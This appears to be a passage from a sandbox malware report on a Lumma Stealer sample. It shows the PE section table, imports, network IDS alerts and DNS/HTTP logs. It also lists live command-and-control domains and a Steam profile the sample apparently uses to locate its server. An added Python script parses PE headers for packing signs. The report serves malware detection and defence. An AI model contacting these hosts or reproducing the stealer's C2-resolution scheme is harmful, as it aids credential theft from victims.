.rdata  0x40000          0x2272        0x2400    02823cc98bd8e55102503e87d75180f4  False     0.3528645833333333  data       5.40348420666472    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x43000          0x3dd118      0x7000    76cc7ca842dab3a08d822ff206bbc78e  unknown   unknown             unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x421000         0xaba8        0xac00    035759e3ed74f008e518eaed194c8ac5  False     0.401866824127907   data       3.9530745630526813  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
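The section table is the static evidence behind the report's unpacking signatures. .data declares a VirtualSize of 0x3dd118 (about 4 MB) but only 0x7000 bytes on disk, so the loader reserves roughly 4 MB of zero-filled, writable memory that the sample can later fill with decrypted code or data; .text measures entropy 7.37, well above what plainly compiled x86 code usually shows. The header adds that DLL Characteristics lists only TERMINAL_SERVER_AWARE (no DYNAMIC_BASE, no NX_COMPAT) and that relocations are stripped, so the image always maps at 0x400000. The Python script below is an added example and is not part of the Joe Sandbox report or the sample: it builds a constructed PE32 skeleton that reproduces the header flags and section table shown here (no real bytes from the sample; a deterministic high-entropy filler stands in for .text), parses it with offsets taken from the PE/COFF specification, and prints these findings. The 1 MiB slack and 7.0 entropy thresholds are heuristics chosen for this example, not values from the report.

```python
"""Static triage of a PE32 header and section table (added example, not Joe Sandbox code).
Offsets follow the Microsoft PE/COFF specification; the thresholds are heuristics chosen here."""
import hashlib
import math
import struct
from collections import Counter
from dataclasses import dataclass

IMAGE_FILE_RELOCS_STRIPPED = 0x0001  # flag values below are from winnt.h
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
UNPACK_SLACK_BYTES = 1 << 20  # heuristic: >1 MiB of VirtualSize with no bytes on disk behind it
CODE_ENTROPY_LIMIT = 7.0      # heuristic: ordinary compiled x86 code measures well below this

@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int
    entropy: float  # Shannon entropy of the raw bytes actually present in the file

def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def parse_pe32(data: bytes):
    """Return (FileCharacteristics, DllCharacteristics, [Section]) for a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, SymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if struct.unpack_from("<H", data, opt_off)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) optional headers are handled here")
    dll_chars = struct.unpack_from("<H", data, opt_off + 70)[0]  # DllCharacteristics, PE32 offset 70
    sections = []
    for i in range(nsections):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        raw = data[rptr:rptr + rsize] if rptr else b""  # a truncated file just yields fewer bytes
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                va, vsize, rsize, chars, shannon_entropy(raw)))
    return file_chars, dll_chars, sections

def triage(file_chars: int, dll_chars: int, sections) -> list:
    """Header and section-table findings, in the order an analyst would read them."""
    findings = []
    if not dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        findings.append("no DYNAMIC_BASE: image always maps at ImageBase (no ASLR)")
    if file_chars & IMAGE_FILE_RELOCS_STRIPPED:
        findings.append("RELOCS_STRIPPED: no relocation data, so it could not be rebased anyway")
    if not dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        findings.append("no NX_COMPAT: image does not opt in to DEP")
    for s in sections:
        slack = s.virtual_size - s.raw_size
        if slack > UNPACK_SLACK_BYTES:
            findings.append(f"{s.name}: VirtualSize 0x{s.virtual_size:x} exceeds SizeOfRawData "
                            f"0x{s.raw_size:x} by 0x{slack:x} bytes (staging room for unpacked code/data)")
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.characteristics & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s.name}: section is writable and executable (RWX)")
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.entropy > CODE_ENTROPY_LIMIT:
            findings.append(f"{s.name}: executable section entropy {s.entropy:.2f} (packed or encrypted code)")
    return findings

def build_sample_image() -> bytes:
    """Constructed PE32 skeleton mirroring the report's header flags and section table (no real sample bytes)."""
    # (name, VirtualSize, VirtualAddress, SizeOfRawData, Characteristics) as listed in the section table above
    table = [(b".text", 0x3EE9C, 0x1000, 0x3F000, 0x60000020),   # CODE | EXECUTE | READ
             (b".rdata", 0x2272, 0x40000, 0x2400, 0x40000040),   # INITIALIZED_DATA | READ
             (b".data", 0x3DD118, 0x43000, 0x7000, 0xC0000040),  # INITIALIZED_DATA | READ | WRITE
             (b".rsrc", 0xABA8, 0x421000, 0xAC00, 0x40000040)]   # INITIALIZED_DATA | READ
    headers_size = 0x400
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(table), 0x64EC1F9B, 0, 0, 224,
                       0x0103)  # RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x16FC)    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)  # ImageBase
    struct.pack_into("<H", opt, 70, 0x8000)    # DllCharacteristics: TERMINAL_SERVER_AWARE only
    sec_hdrs, rptr = b"", headers_size
    for name, vsize, va, rsize, chars in table:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, rsize, rptr, 0, 0, 0, 0, chars)
        rptr += rsize
    image = (dos + b"PE\0\0" + coff + bytes(opt) + sec_hdrs).ljust(headers_size, b"\0")
    # Stand-in for .text: 4 KiB of deterministic high-entropy filler (the sample's own code is not reproduced)
    return image + b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))

if __name__ == "__main__":
    print("\n".join(triage(*parse_pe32(build_sample_image()))))
```

Running the script on the constructed image reports the missing ASLR/DEP opt-ins, the stripped relocations, the .data slack and the high-entropy .text, and nothing for .rdata or .rsrc. To apply the same checks to a real file, replace build_sample_image() with the file's bytes; parse_pe32 deliberately tolerates truncated section data, since samples pulled from memory or a download cache are often cut short, and it rejects PE32+ (64-bit) images because the DllCharacteristics offset differs there.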
Name           RVA       Size    Language  Country       ZLIB Complexity      Type
RT_ICON        0x421430  0xea8   Turkmen   Turkmenistan  0.2835820895522388   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
RT_ICON        0x4222d8  0x8a8   Turkmen   Turkmenistan  0.28564981949458484  Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON        0x422b80  0x6c8   Turkmen   Turkmenistan  0.41359447004608296  Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
RT_ICON        0x423248  0x568   Turkmen   Turkmenistan  0.29552023121387283  Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON        0x4237b0  0x25a8  Turkmen   Turkmenistan  0.3857883817427386   Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON        0x425d58  0x10a8  Turkmen   Turkmenistan  0.4481707317073171   Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_ICON        0x426e00  0x988   Turkmen   Turkmenistan  0.5922131147540983   Device independent bitmap graphic, 24 x 48 x 32, image size 2304
RT_ICON        0x427788  0x468   Turkmen   Turkmenistan  0.6640070921985816   Device independent bitmap graphic, 16 x 32 x 32, image size 1024
RT_STRING      0x427e20  0x330                           0.4730392156862745   data
RT_STRING      0x428150  0x170                           0.5081521739130435   data
RT_STRING      0x4282c0  0x620                           0.4343112244897959   data
RT_STRING      0x4288e0  0x762                           0.4174603174603175   data
RT_STRING      0x429048  0x852                           0.415962441314554    data
RT_STRING      0x4298a0  0x726                           0.42349726775956287  data
RT_STRING      0x429fc8  0x658                           0.43596059113300495  data
RT_STRING      0x42a620  0x6c0                           0.4351851851851852   data
RT_STRING      0x42ace0  0x638                           0.4396984924623116   data
RT_STRING      0x42b318  0x88a                           0.4080512351326624   data
RT_GROUP_ICON  0x427bf0  0x76    Turkmen   Turkmenistan  0.6610169491525424   data
RT_VERSION     0x427c68  0x1b4                           0.5756880733944955   data
DLL | Import
KERNEL32.dll | GetCommandLineW, GetComputerNameA, SetDefaultCommConfigA, WriteConsoleOutputW, SetWaitableTimer, SetUnhandledExceptionFilter, EndUpdateResourceW, InterlockedIncrement, InterlockedDecrement, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, GetModuleHandleW, GetDateFormatA, SetProcessPriorityBoost, LoadLibraryW, ReadProcessMemory, DeleteVolumeMountPointW, GetConsoleAliasW, GetAtomNameW, GetStartupInfoW, DisconnectNamedPipe, SetLastError, GetProcAddress, SearchPathA, SetFileAttributesA, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, AddAtomA, FoldStringA, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, GetShortPathNameW, Module32Next, GetVersionExA, FindAtomW, FindFirstVolumeW, UnregisterWaitEx, WriteConsoleW, GetConsoleOutputCP, GetLastError, HeapFree, HeapAlloc, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, CreateFileA
USER32.dll | GetProcessDefaultLayout
Language of compilation system | Country where language is spoken | Map
Turkmen | Turkmenistan |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T09:05:05.853014+0100 | 2058285 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) | 1 | 192.168.2.8 | 53100 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.013971+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.8 | 49713 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.250945+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.8 | 64708 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.482372+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.8 | 56885 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.702284+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.8 | 58192 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.012101+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.8 | 57769 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.237760+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.8 | 63066 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.471701+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.8 | 57941 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.795281+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.8 | 65146 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:09.648432+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
2024-12-24T09:05:10.476631+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
2024-12-24T09:05:12.050993+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:12.811595+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:12.811595+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:13.830658+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 09:05:08.252239943 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:08.252285957 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:08.252363920 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:08.255775928 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:08.255790949 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:09.648354053 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:09.648432016 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:09.650865078 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:09.650882006 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:09.651163101 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:09.705044985 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:09.747342110 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476686001 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476722956 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476733923 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476751089 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476759911 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476804972 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.476862907 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.476885080 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.476914883 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.656766891 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.656816006 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.656869888 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.656883001 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.656925917 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.687675953 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.687716961 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.687766075 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.687794924 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.687813997 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.688813925 CET | 49705 | 443 | 192.168.2.8 | 23.55.153.106
Dec 24, 2024 09:05:10.688833952 CET | 443 | 49705 | 23.55.153.106 | 192.168.2.8
Dec 24, 2024 09:05:10.832407951 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:10.832469940 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:10.832535982 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:10.833019018 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:10.833031893 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.050713062 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.050992966 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.053426027 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.053448915 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.053730011 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.054924965 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.054924965 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.055017948 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.811551094 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.811650991 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.811817884 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.812163115 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.812180042 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.812216043 CET | 49706 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.812222004 CET | 443 | 49706 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.916273117 CET | 49707 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.916318893 CET | 443 | 49707 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:12.916418076 CET | 49707 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.916711092 CET | 49707 | 443 | 192.168.2.8 | 172.67.157.254
Dec 24, 2024 09:05:12.916728973 CET | 443 | 49707 | 172.67.157.254 | 192.168.2.8
Dec 24, 2024 09:05:13.830657959 CET | 49707 | 443 | 192.168.2.8 | 172.67.157.254
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 09:05:05.853013992 CET | 53100 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:05.997129917 CET | 53 | 53100 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:06.013971090 CET | 49713 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:06.247406960 CET | 53 | 49713 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:06.250945091 CET | 64708 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:06.480895996 CET | 53 | 64708 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:06.482372046 CET | 56885 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:06.700800896 CET | 53 | 56885 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:06.702284098 CET | 58192 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:07.010374069 CET | 53 | 58192 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:07.012100935 CET | 57769 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:07.236182928 CET | 53 | 57769 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:07.237760067 CET | 63066 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:07.463104010 CET | 53 | 63066 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:07.471700907 CET | 57941 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:07.695832014 CET | 53 | 57941 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:07.795280933 CET | 65146 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:08.106158018 CET | 53 | 65146 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:08.108994007 CET | 53345 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:08.246706009 CET | 53 | 53345 | 1.1.1.1 | 192.168.2.8
Dec 24, 2024 09:05:10.693633080 CET | 64420 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 09:05:10.831422091 CET | 53 | 64420 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 09:05:05.853013992 CET | 192.168.2.8 | 1.1.1.1 | 0xc8bc | Standard query (0) | spellshagey.biz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.013971090 CET | 192.168.2.8 | 1.1.1.1 | 0x5daa | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.250945091 CET | 192.168.2.8 | 1.1.1.1 | 0x2def | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.482372046 CET | 192.168.2.8 | 1.1.1.1 | 0x5df2 | Standard query (0) | effecterectz.xyz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.702284098 CET | 192.168.2.8 | 1.1.1.1 | 0x594a | Standard query (0) | diffuculttan.xyz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.012100935 CET | 192.168.2.8 | 1.1.1.1 | 0x9216 | Standard query (0) | debonairnukk.xyz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.237760067 CET | 192.168.2.8 | 1.1.1.1 | 0xca74 | Standard query (0) | wrathful-jammy.cyou | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.471700907 CET | 192.168.2.8 | 1.1.1.1 | 0xccdb | Standard query (0) | awake-weaves.cyou | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.795280933 CET | 192.168.2.8 | 1.1.1.1 | 0x6d9d | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:08.108994007 CET | 192.168.2.8 | 1.1.1.1 | 0xf268 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:10.693633080 CET | 192.168.2.8 | 1.1.1.1 | 0xac7e | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 09:05:05.997129917 CET | 1.1.1.1 | 192.168.2.8 | 0xc8bc | Name error (3) | spellshagey.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.247406960 CET | 1.1.1.1 | 192.168.2.8 | 0x5daa | Name error (3) | immureprech.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.480895996 CET | 1.1.1.1 | 192.168.2.8 | 0x2def | Name error (3) | deafeninggeh.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:06.700800896 CET | 1.1.1.1 | 192.168.2.8 | 0x5df2 | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.010374069 CET | 1.1.1.1 | 192.168.2.8 | 0x594a | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.236182928 CET | 1.1.1.1 | 192.168.2.8 | 0x9216 | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.463104010 CET | 1.1.1.1 | 192.168.2.8 | 0xca74 | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:07.695832014 CET | 1.1.1.1 | 192.168.2.8 | 0xccdb | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:08.106158018 CET | 1.1.1.1 | 192.168.2.8 | 0x6d9d | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:08.246706009 CET | 1.1.1.1 | 192.168.2.8 | 0xf268 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:10.831422091 CET | 1.1.1.1 | 192.168.2.8 | 0xac7e | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:05:10.831422091 CET | 1.1.1.1 | 192.168.2.8 | 0xac7e | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | 1564 | C:\Users\user\Desktop\3zg6i6Zu1u.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 08:05:09 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-24 08:05:10 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 24 Dec 2024 08:05:10 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=961e72f9998caf5f7a0337ff; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-24 08:05:10 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-24 08:05:10 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
